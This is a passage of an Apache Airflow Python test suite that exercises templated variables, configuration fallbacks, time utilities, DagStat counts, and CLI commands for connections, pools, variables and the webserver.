Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# the failed task should have accumulated at least the 3 second execution timeout
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
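# exercise run_command with multi-byte output on both Python 2 and 3,
# plus a plain echo and a failing command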
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, dag_run_obj):
dag_run_obj.run_id = run_id
return dag_run_obj
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date, utc_now)
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
configuration.load_test_config()
app = application.create_app()
app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
self.session = Session()
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test1', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@foo.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test2', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@apache.org', '-r', 'Viewer', '-p', 'test'
])
cli.create_user(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall(r"'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare expected values to verify the added connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Verify the added connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
def test_process_subdir_path_with_placeholder(self):
self.assertEqual(os.path.join(settings.DAGS_FOLDER, 'abc'), cli.process_subdir('DAGS_FOLDER/abc'))
def test_trigger_dag(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'-c', '{"foo": "bar"}']))
self.assertRaises(
ValueError,
cli.trigger_dag,
self.parser.parse_args([
'trigger_dag', 'example_bash_operator',
'--run_id', 'trigger_dag_xxx',
'-c', 'NOT JSON'])
)
def test_delete_dag(self):
DM = models.DagModel
key = "my_dag_id"
session = settings.Session()
session.add(DM(dag_id=key))
session.commit()
cli.delete_dag(self.parser.parse_args([
'delete_dag', key, '--yes']))
self.assertEqual(session.query(DM).filter_by(dag_id=key).count(), 0)
self.assertRaises(
AirflowException,
cli.delete_dag,
self.parser.parse_args([
'delete_dag',
'does_not_exist_dag',
'--yes'])
)
def test_pool_create(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
self.assertEqual(self.session.query(models.Pool).count(), 1)
def test_pool_get(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
try:
cli.pool(self.parser.parse_args(['pool', '-g', 'foo']))
except Exception as e:
self.fail("The 'pool -g foo' command raised unexpectedly: %s" % e)
def test_pool_delete(self):
cli.pool(self.parser.parse_args(['pool', '-s', 'foo', '1', 'test']))
cli.pool(self.parser.parse_args(['pool', '-x', 'foo']))
self.assertEqual(self.session.query(models.Pool).count(), 0)
def test_pool_no_args(self):
try:
cli.pool(self.parser.parse_args(['pool']))
except Exception as e:
self.fail("The 'pool' command raised unexpectedly: %s" % e)
def test_variables(self):
# Checks if all subcommands are properly received
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"bar"}']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'foo']))
cli.variables(self.parser.parse_args([
'variables', '-g', 'baz', '-d', 'bar']))
cli.variables(self.parser.parse_args([
'variables']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'bar']))
cli.variables(self.parser.parse_args([
'variables', '-i', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-e', DEV_NULL]))
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'original']))
# First export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables1.json']))
first_exp = open('variables1.json', 'r')
cli.variables(self.parser.parse_args([
'variables', '-s', 'bar', 'updated']))
cli.variables(self.parser.parse_args([
'variables', '-s', 'foo', '{"foo":"oops"}']))
cli.variables(self.parser.parse_args([
'variables', '-x', 'foo']))
# First import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables1.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
# Second export
cli.variables(self.parser.parse_args([
'variables', '-e', 'variables2.json']))
second_exp = open('variables2.json', 'r')
self.assertEqual(first_exp.read(), second_exp.read())
second_exp.close()
first_exp.close()
# Second import
cli.variables(self.parser.parse_args([
'variables', '-i', 'variables2.json']))
self.assertEqual('original', models.Variable.get('bar'))
self.assertEqual('{"foo": "bar"}', models.Variable.get('foo'))
os.remove('variables1.json')
os.remove('variables2.json')
def _wait_pidfile(self, pidfile):
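# poll until the pidfile exists and contains a parseable pid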
while True:
try:
with open(pidfile) as f:
return int(f.read())
except (IOError, ValueError):
sleep(1)
def test_cli_webserver_foreground(self):
# Confirm that webserver hasn't been launched.
# pgrep returns exit status 1 if no process matched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in foreground and terminate it.
p = subprocess.Popen(["airflow", "webserver"])
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_foreground_with_pid(self):
# Run webserver in foreground with --pid option
pidfile = tempfile.mkstemp()[1]
p = subprocess.Popen(["airflow", "webserver", "--pid", pidfile])
# Check the file specified by --pid option exists
self._wait_pidfile(pidfile)
# Terminate webserver
p.terminate()
p.wait()
@unittest.skipIf("TRAVIS" in os.environ and bool(os.environ["TRAVIS"]),
"Skipping test due to lack of required file permission")
def test_cli_webserver_background(self):
import psutil
# Confirm that webserver hasn't been launched.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Run webserver in background.
subprocess.Popen(["airflow", "webserver", "-D"])
pidfile = cli.setup_locations("webserver")[0]
self._wait_pidfile(pidfile)
# Assert that gunicorn and its monitor are launched.
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(0, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Terminate monitor process.
pidfile = cli.setup_locations("webserver-monitor")[0]
pid = self._wait_pidfile(pidfile)
p = psutil.Process(pid)
p.terminate()
p.wait()
# Assert that no process remains.
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "airflow"]).wait())
self.assertEqual(1, subprocess.Popen(["pgrep", "-c", "gunicorn"]).wait())
# Patch for causing webserver timeout
